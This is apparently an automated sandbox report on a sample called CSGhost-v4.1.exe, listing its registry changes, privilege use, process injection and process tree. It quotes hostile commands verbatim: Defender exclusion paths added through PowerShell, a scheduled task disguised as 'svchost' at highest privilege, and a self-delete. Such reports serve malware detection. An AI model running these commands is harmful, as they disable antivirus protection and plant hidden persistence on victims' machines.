Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2188 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 2536 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2536 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2536 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2452 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 3040 wrote to memory of 1112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3040 wrote to memory of 1112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3040 wrote to memory of 1112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2452 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2452 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2452 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2452 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 1632 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\system32\cmd.exe
PID 1632 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\system32\cmd.exe
PID 1632 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 1088 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 1088 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 2900 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 1632 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 1632 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 2160 wrote to memory of 680 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2160 wrote to memory of 680 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe

"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\system32\cmd.exe

